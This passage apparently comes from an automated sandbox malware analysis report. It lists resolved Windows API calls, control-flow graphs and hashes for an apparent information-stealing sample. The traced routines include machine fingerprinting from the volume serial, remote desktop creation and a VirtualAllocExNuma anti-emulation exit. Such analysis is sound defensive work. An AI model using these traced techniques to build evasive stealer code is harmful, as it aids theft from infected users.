                          • GetProcAddress.KERNEL32(75A50000,CloseDesktop), ref: 00646F05
                          • GetProcAddress.KERNEL32(75070000,012865A0), ref: 00646F21
                          • GetProcAddress.KERNEL32(75070000,0129C938), ref: 00646F39
                          • GetProcAddress.KERNEL32(75070000,0129C950), ref: 00646F52
                          • GetProcAddress.KERNEL32(75070000,0129C968), ref: 00646F6A
                          • GetProcAddress.KERNEL32(75070000,0129C998), ref: 00646F82
                          • GetProcAddress.KERNEL32(74E50000,012863A0), ref: 00646F9E
                          • GetProcAddress.KERNEL32(74E50000,012865E0), ref: 00646FB6
                          • GetProcAddress.KERNEL32(75320000,01286400), ref: 00646FD2
                          • GetProcAddress.KERNEL32(75320000,0129CC80), ref: 00646FEA
                          • GetProcAddress.KERNEL32(6F490000,01286280), ref: 0064700A
                          • GetProcAddress.KERNEL32(6F490000,01286600), ref: 00647022
                          • GetProcAddress.KERNEL32(6F490000,012863C0), ref: 0064703B
                          • GetProcAddress.KERNEL32(6F490000,0129CC68), ref: 00647053
                          • GetProcAddress.KERNEL32(6F490000,01286420), ref: 0064706B
                          • GetProcAddress.KERNEL32(6F490000,01286440), ref: 00647084
                          • GetProcAddress.KERNEL32(6F490000,012862A0), ref: 0064709C
                          • GetProcAddress.KERNEL32(6F490000,01286460), ref: 006470B4
                          • GetProcAddress.KERNEL32(6F490000,InternetSetOptionA), ref: 006470CB
                          • GetProcAddress.KERNEL32(6F490000,HttpQueryInfoA), ref: 006470E2
                          • GetProcAddress.KERNEL32(74E00000,0129CDD0), ref: 006470FE
                          • GetProcAddress.KERNEL32(74E00000,01298960), ref: 00647116
                          • GetProcAddress.KERNEL32(74E00000,0129CDE8), ref: 0064712F
                          • GetProcAddress.KERNEL32(74E00000,0129CCC8), ref: 00647147
                          • GetProcAddress.KERNEL32(74DF0000,01286640), ref: 00647163
                          • GetProcAddress.KERNEL32(6E540000,0129CD10), ref: 0064717F
                          • GetProcAddress.KERNEL32(6E540000,01286500), ref: 00647197
                          • GetProcAddress.KERNEL32(6E540000,0129CC20), ref: 006471B0
                          • GetProcAddress.KERNEL32(6E540000,0129CE78), ref: 006471C8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                          • API String ID: 2238633743-3468015613
                          • Opcode ID: 8f51dc6749f3f47d9fa0438c68e20083887daebdc4765003369bffbc08b1e466
                          • Instruction ID: 04f2d745a2edb0fe815deb54ec43ec0a02939a47fb0fb2da0dc5a8d50c888a87
                          • Opcode Fuzzy Hash: 8f51dc6749f3f47d9fa0438c68e20083887daebdc4765003369bffbc08b1e466
                          • Instruction Fuzzy Hash: 0D6210B5511B00DFD754DF64EC89A263BBAF78C643310891AE996D33A4EB3CA840DF61
                          APIs
                          • lstrlen.KERNEL32(0064CFEC), ref: 0063F1D5
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0063F1F1
                          • lstrlen.KERNEL32(0064CFEC), ref: 0063F1FC
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0063F215
                          • lstrlen.KERNEL32(0064CFEC), ref: 0063F220
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0063F239
                          • lstrcpy.KERNEL32(00000000,00654FA0), ref: 0063F25E
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0063F28C
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0063F2C0
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0063F2F0
                          • lstrlen.KERNEL32(01286880), ref: 0063F315
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID: ERROR
                          • API String ID: 367037083-2861137601
                          • Opcode ID: 3f0f6551145e9e2f450efc62f25f82f6b60d1efc4dcab2db9fed208dcfcbb9c6
                          • Instruction ID: fdfab9c09116531df6bb9337cf15664758b1b4d7da74fe51ca0c703b7b90cc77
                          • Opcode Fuzzy Hash: 3f0f6551145e9e2f450efc62f25f82f6b60d1efc4dcab2db9fed208dcfcbb9c6
                          • Instruction Fuzzy Hash: 35A24870D01616DFCB60DF65D848A9ABBF6BF44315F188079E8499B362EB39DC42CB90
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00640013
                          • lstrlen.KERNEL32(0064CFEC), ref: 006400BD
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 006400E1
                          • lstrlen.KERNEL32(0064CFEC), ref: 006400EC
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00640110
                          • lstrlen.KERNEL32(0064CFEC), ref: 0064011B
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0064013F
                          • lstrlen.KERNEL32(0064CFEC), ref: 0064015A
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00640189
                          • lstrlen.KERNEL32(0064CFEC), ref: 00640194
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 006401C3
                          • lstrlen.KERNEL32(0064CFEC), ref: 006401CE
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00640206
                          • lstrlen.KERNEL32(0064CFEC), ref: 00640250
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00640288
                          • lstrcpy.KERNEL32(00000000,?), ref: 0064059B
                          • lstrlen.KERNEL32(01286840), ref: 006405AB
                          • lstrcpy.KERNEL32(00000000,?), ref: 006405D7
                          • lstrcat.KERNEL32(00000000,?), ref: 006405E3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0064060E
                          • lstrlen.KERNEL32(0129DEB8), ref: 00640625
                          • lstrcpy.KERNEL32(00000000,?), ref: 0064064C
                          • lstrcat.KERNEL32(00000000,?), ref: 00640658
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00640681
                          • lstrlen.KERNEL32(01286760), ref: 00640698
                          • lstrcpy.KERNEL32(00000000,?), ref: 006406C9
                          • lstrcat.KERNEL32(00000000,?), ref: 006406D5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00640706
                          • lstrcpy.KERNEL32(00000000,012988D0), ref: 0064074B
                            • Part of subcall function 00621530: lstrcpy.KERNEL32(00000000,?), ref: 00621557
                            • Part of subcall function 00621530: lstrcpy.KERNEL32(00000000,?), ref: 00621579
                            • Part of subcall function 00621530: lstrcpy.KERNEL32(00000000,?), ref: 0062159B
                            • Part of subcall function 00621530: lstrcpy.KERNEL32(00000000,?), ref: 006215FF
                          • lstrcpy.KERNEL32(00000000,?), ref: 0064077F
                          • lstrcpy.KERNEL32(00000000,0129DCC0), ref: 006407E7
                          • lstrcpy.KERNEL32(00000000,01298A20), ref: 00640858
                          • lstrcpy.KERNEL32(00000000,fplugins), ref: 006408CF
                          • lstrcpy.KERNEL32(00000000,?), ref: 00640928
                          • lstrcpy.KERNEL32(00000000,01298B40), ref: 006409F8
                            • Part of subcall function 006224E0: lstrcpy.KERNEL32(00000000,?), ref: 00622528
                            • Part of subcall function 006224E0: lstrcpy.KERNEL32(00000000,?), ref: 0062254E
                            • Part of subcall function 006224E0: lstrcpy.KERNEL32(00000000,?), ref: 00622577
                          • lstrcpy.KERNEL32(00000000,01298B90), ref: 00640ACE
                          • lstrcpy.KERNEL32(00000000,?), ref: 00640B81
                          • lstrcpy.KERNEL32(00000000,01298B90), ref: 00640D58
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat
                          • String ID: fplugins
                          • API String ID: 2500673778-38756186
                          • Opcode ID: da899da455b2c382fe0e7f33514ca8f5e46d111cc8dfa27ea129543fcaf3fda5
                          • Instruction ID: a93165c2543c0971184a336c5fc12918d215ea0e718c60a085ca5acff469fa6e
                          • Opcode Fuzzy Hash: da899da455b2c382fe0e7f33514ca8f5e46d111cc8dfa27ea129543fcaf3fda5
                          • Instruction Fuzzy Hash: 62E26970A053418FD764DF29C488B9ABBE2BF89304F58856EE58D8B352DB35D885CF42
                          APIs
                          • lstrlen.KERNEL32(01286880), ref: 0063F315
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063F3A3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063F3C7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063F47B
                          • lstrcpy.KERNEL32(00000000,01286880), ref: 0063F4BB
                          • lstrcpy.KERNEL32(00000000,012987F0), ref: 0063F4EA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063F59E
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0063F61C
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063F64C
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063F69A
                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 0063F718
                          • lstrlen.KERNEL32(01298900), ref: 0063F746
                          • lstrcpy.KERNEL32(00000000,01298900), ref: 0063F771
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063F793
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063F7E4
                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 0063FA32
                          • lstrlen.KERNEL32(01298920), ref: 0063FA60
                          • lstrcpy.KERNEL32(00000000,01298920), ref: 0063FA8B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063FAAD
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063FAFE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID: ERROR
                          • API String ID: 367037083-2861137601
                          • Opcode ID: 5e504c110cda0a9efaaabe305455fda434fe73baeaf15697fd0bb35367452a0b
                          • Instruction ID: 8cac5ea8209d57c248558f31c291dca4b613e2775aa6dc333d0099cf102f761e
                          • Opcode Fuzzy Hash: 5e504c110cda0a9efaaabe305455fda434fe73baeaf15697fd0bb35367452a0b
                          • Instruction Fuzzy Hash: C4F11870E01712CFDB64CF29D854AA9B7E6BF44315F1980BAD4499B362DB3ADC42CB90

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2721 638ca0-638cc4 StrCmpCA 2722 638cc6-638cc7 ExitProcess 2721->2722 2723 638ccd-638ce6 2721->2723 2725 638ee2-638eef call 622a20 2723->2725 2726 638cec-638cf1 2723->2726 2728 638cf6-638cf9 2726->2728 2729 638ec3-638edc 2728->2729 2730 638cff 2728->2730 2729->2725 2764 638cf3 2729->2764 2732 638d06-638d15 lstrlen 2730->2732 2733 638d84-638d92 StrCmpCA 2730->2733 2734 638da4-638db8 StrCmpCA 2730->2734 2735 638e88-638e9a lstrlen 2730->2735 2736 638e6f-638e7d StrCmpCA 2730->2736 2737 638d30-638d3f lstrlen 2730->2737 2738 638e56-638e64 StrCmpCA 2730->2738 2739 638d5a-638d69 lstrlen 2730->2739 2740 638dbd-638dcb StrCmpCA 2730->2740 2741 638ddd-638deb StrCmpCA 2730->2741 2742 638dfd-638e0b StrCmpCA 2730->2742 2743 638e1d-638e2b StrCmpCA 2730->2743 2744 638e3d-638e4b StrCmpCA 2730->2744 2753 638d17-638d1c call 622a20 2732->2753 2754 638d1f-638d2b call 622930 2732->2754 2733->2729 2748 638d98-638d9f 2733->2748 2734->2729 2758 638ea4-638eb0 call 622930 2735->2758 2759 638e9c-638ea1 call 622a20 2735->2759 2736->2729 2757 638e7f-638e86 2736->2757 2760 638d41-638d46 call 622a20 2737->2760 2761 638d49-638d55 call 622930 2737->2761 2738->2729 2756 638e66-638e6d 2738->2756 2745 638d73-638d7f call 622930 2739->2745 2746 638d6b-638d70 call 622a20 2739->2746 2740->2729 2749 638dd1-638dd8 2740->2749 2741->2729 2750 638df1-638df8 2741->2750 2742->2729 2751 638e11-638e18 2742->2751 2743->2729 2752 638e31-638e38 2743->2752 2744->2729 2755 638e4d-638e54 2744->2755 2779 638eb3-638eb5 2745->2779 2746->2745 2748->2729 2749->2729 2750->2729 2751->2729 2752->2729 2753->2754 2754->2779 2755->2729 2756->2729 2757->2729 2758->2779 2759->2758 2760->2761 2761->2779 2764->2728 2779->2729 2780 638eb7-638eb9 2779->2780 2780->2729 2781 638ebb-638ebd lstrcpy 2780->2781 2781->2729
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: e988631c107ae57b84c553dad7257326f7e88e86aa2dc7756e9b8ba8b68e5af9
                          • Instruction ID: e61ccbff3cca24006296e4c8e05aea75d6f31cc21f828acdeb03fea555ba68aa
                          • Opcode Fuzzy Hash: e988631c107ae57b84c553dad7257326f7e88e86aa2dc7756e9b8ba8b68e5af9
                          • Instruction Fuzzy Hash: 07514A70D04B02EFC7209F65DCC5AABBAF6BB84705F10481DF482D3651DB78A5468BA1

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2782 642740-642783 GetWindowsDirectoryA 2783 642785 2782->2783 2784 64278c-6427ea GetVolumeInformationA 2782->2784 2783->2784 2785 6427ec-6427f2 2784->2785 2786 6427f4-642807 2785->2786 2787 642809-642820 GetProcessHeap RtlAllocateHeap 2785->2787 2786->2785 2788 642826-642844 wsprintfA 2787->2788 2789 642822-642824 2787->2789 2790 64285b-642872 call 6471e0 2788->2790 2789->2790
                          APIs
                          • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 0064277B
                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,006393B6,00000000,00000000,00000000,00000000), ref: 006427AC
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0064280F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00642816
                          • wsprintfA.USER32 ref: 0064283B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                          • String ID: :\$C
                          • API String ID: 2572753744-3309953409
                          • Opcode ID: 166298245a148f4693fa3eb40a68afc254ebe9de303511a4041d77ad4d0cd35b
                          • Instruction ID: bfb51078441d6a055a980362c6df4a138160c5ad810f777f06c4420ed298450a
                          • Opcode Fuzzy Hash: 166298245a148f4693fa3eb40a68afc254ebe9de303511a4041d77ad4d0cd35b
                          • Instruction Fuzzy Hash: CF316FB190820A9FCB04CFB88985AEFBFBDFF58711F10016AE505F7650E6348A408BA1

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2793 624bc0-624bce 2794 624bd0-624bd5 2793->2794 2794->2794 2795 624bd7-624c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call 622a20 2794->2795
                          APIs
                          • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 00624BF7
                          • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00624C01
                          • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00624C0B
                          • lstrlen.KERNEL32(?,00000000,?), ref: 00624C1F
                          • InternetCrackUrlA.WININET(?,00000000), ref: 00624C27
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ??2@$CrackInternetlstrlen
                          • String ID: <
                          • API String ID: 1683549937-4251816714
                          • Opcode ID: 3d3910a797e71add2b4817ad80ca346a6c132255ff1f034980b39d64f320183d
                          • Instruction ID: b05cbe7be0b0e4b4f2d7aa28d3156f091f716ed22cf26f9a23fd17324a5f8897
                          • Opcode Fuzzy Hash: 3d3910a797e71add2b4817ad80ca346a6c132255ff1f034980b39d64f320183d
                          • Instruction Fuzzy Hash: 00012971D00218ABDB10DFA9EC45B9EBBB9EB08325F00812AF914E7390EF7499048FD4

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2798 621030-621055 GetCurrentProcess VirtualAllocExNuma 2799 621057-621058 ExitProcess 2798->2799 2800 62105e-62107b VirtualAlloc 2798->2800 2801 621082-621088 2800->2801 2802 62107d-621080 2800->2802 2803 6210b1-6210b6 2801->2803 2804 62108a-6210ab VirtualFree 2801->2804 2802->2801 2804->2803
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00621046
